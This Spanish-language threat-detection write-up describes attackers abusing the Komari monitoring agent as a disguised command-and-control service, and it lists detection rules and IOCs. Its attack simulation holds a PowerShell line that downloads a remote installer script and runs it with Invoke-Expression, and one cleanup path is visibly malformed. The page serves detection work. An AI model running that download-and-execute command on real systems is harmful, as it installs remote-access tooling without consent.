Komari: La herramienta de «monitoreo» que no necesitaba ser armada
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un actor de amenazas utilizó credenciales de VPN robadas para acceder a una estación de trabajo de Windows de un socio de Huntress, luego habilitó RDP y desplegó el agente de monitoreo de código abierto Komari como un servicio a nivel de SISTEMA disfrazado como Servicio de Actualización de Windows a través de NSSM. Una vez instalado, el agente estableció una conexión persistente de WebSocket con la infraestructura controlada por el atacante y proporcionó capacidades como ejecución de comandos, acceso a terminal y comprobaciones de conexión de tipo latido. En la práctica, la herramienta funcionó como un marco ligero de comando y control sin requerir adicional armamento.
Investigación
La intrusión comenzó con un inicio de sesión en la VPN SSL que se originó desde 45.153.34.132, seguido por el uso del smbexec.py de Impacket para habilitar RDP y ejecutar una serie de comandos remotos. Los investigadores encontraron que una línea de comando de PowerShell descargó el instalador de Komari directamente desde GitHub y lo registró como un servicio de Windows. Ese servicio luego lanzó komari-agent.exe, abrió una sesión de WebSocket al servidor del atacante y habilitó la ejecución de comandos remotos arbitrarios en el host.
Mitigación
Huntress respondió aislando la estación de trabajo comprometida, deshabilitando la cuenta de usuario afectada y deteniendo el servicio Komari creado por NSSM. La conexión maliciosa de WebSocket fue bloqueada y el mecanismo de persistencia fue eliminado del sistema. Las defensas de seguimiento recomendadas incluyen endurecer los controles de acceso a la VPN, monitorear la creación de servicios sospechosos, inspeccionar la actividad de WebSocket saliente, y fortalecer la seguridad de RDP.
Respuesta
Los defensores deberían detectar la creación de un servicio de Windows llamado Servicio de Actualización de Windows que apunta a komari-agent.exe, monitorizar conexiones de WebSocket salientes de larga duración a hosts desconocidos, y alertar sobre el uso de herramientas Impacket como smbexec.py para movimiento lateral. Si se identifica, el punto final afectado debe ser contenido inmediatamente, revocadas las credenciales comprometidas y el servicio malicioso eliminado del entorno.
Flujo de Ataque
Detecciones
Posibles Patrones de Línea de Comando de Impacket (vía cmdline)
Ver
Posible Ejecución Remota de Código usando Impacket (vía cmdline)
Ver
Powershell Ejecutando Archivo en Directorio Sospechoso Usando Política de Ejecución Bypass (vía cmdline)
Ver
Descarga o Carga a través de Powershell (vía cmdline)
Ver
Posible Sombreado de Servicios de Escritorio Remoto (vía creación de proceso)
Ver
Modificaciones de Firewall Sospechosas vía CLI (vía cmdline)
Ver
Proceso Sospechoso Utiliza una URL en la Línea de Comando (vía cmdline)
Ver
Software Alternativo de Acceso Remoto / Gestión (vía creación de proceso)
Ver
IOCs (HashSha256) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento
Ver
IOCs (SourceIP) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento
Ver
IOCs (DestinationIP) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento
Ver
Detección de Ejecución smbexec.py y cmd.exe de Impacket vía RDP [Creación de Procesos de Windows]
Ver
Ejecución de PowerShell para la Instalación del Agente Komari [Windows PowerShell]
Ver
Detectar Persistencia del Agente Komari vía Servicio de Actualización de Windows [Sistema Windows]
Ver
Detección de Acceso No Autorizado a SSLVPN y Actividad Post-Compromiso [Firewall]
Ver
Ejecución de Simulación
Prerequisito: El Control de Pre-vuelo de Telemetría & Base debe haber pasado.
-
Narrativa del Ataque y Comandos:
Un adversario ha obtenido una postura en un host Windows y desea instalar el agente C2 de Komari para mantener persistencia y luego volcar credenciales (T1003.001). Para evitar desencadenar defensas tradicionales contra scripts, el atacante ejecuta PowerShell con-ExecutionPolicy Bypassy descarga directamente el instalador del repositorio público de GitHub. La línea de comando coincide exactamente con la regla de detección, generando la telemetría esperada. -
Script de Prueba de Regresión:
# Simulación de Instalación del Agente Komari $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
Comandos de Limpieza:
# Elimine cualquier archivo creado por el instalador simulado (si lo hay) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # Detenga cualquier proceso Komari que pueda haber sido iniciado Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force